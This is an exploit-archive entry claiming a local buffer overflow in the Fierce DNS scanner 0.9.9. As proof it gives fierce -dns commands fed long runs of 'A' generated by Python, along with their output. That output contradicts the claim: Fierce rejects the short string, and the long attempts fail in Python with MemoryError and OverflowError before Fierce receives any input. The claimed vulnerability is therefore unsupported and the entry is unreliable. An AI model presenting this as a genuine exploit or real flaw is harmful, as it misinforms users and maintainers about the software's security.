Fierce Buffer Overflow Vulnerability

2017-11-12T00:00:00
ID 1337DAY-ID-28978
Type zdt
Reporter Mojtaba MobhaM
Modified 2017-11-12T00:00:00

Description

Exploit for linux platform in category local exploits

                                        
                                            ################
#Exploit Title: Fierce Buffer Overflow
#Exploit Author :  Persian Hack Team
#Discovered by: Mojtaba MobhaM (MojtabaKazemi)
#Vendor HomePage: http://www.ha.ckers.org/fierce/
#Version : 0.9.9 - Beta 
#Tested on: Kali
#Description: 
Fierce is a semi-lightweight scanner that helps locate non-contiguous
IP space and hostnames against specified domains.  It's really meant
as a pre-cursor to nmap, unicornscan, nessus, nikto, etc, since all
of those require that you already know what IP space you are looking
for.  This does not perform exploitation and does not scan the whole
internet indiscriminately.  It is meant specifically to locate likely
targets both inside and outside a corporate network.  Because it uses
DNS primarily you will often find mis-configured networks that leak
internal address space. That's especially useful in targeted malware.
###############################
#fierce -dns $(python -c 'print "A"*10')

	Uhm, no. "AAAAAAAAAA" is gimp. A bad domain can mess up your day.
	Try again.
Exiting...

#fierce -dns $(python -c 'print "A"*999999999999999')
Traceback (most recent call last):
  File "<string>", line 1, in <module>
MemoryError
Option dns requires an argument
You have to use the -dns switch with a domain after it.
Type: perl fierce.pl -h for help
Exiting...

#fierce -dns $(python -c 'print "A"*9999999999999999999')
Traceback (most recent call last):
  File "<string>", line 1, in <module>
OverflowError: cannot fit 'long' into an index-sized integer
Option dns requires an argument
You have to use the -dns switch with a domain after it.
Type: perl fierce.pl -h for help
Exiting...

###############################

#  0day.today [2018-02-06]  #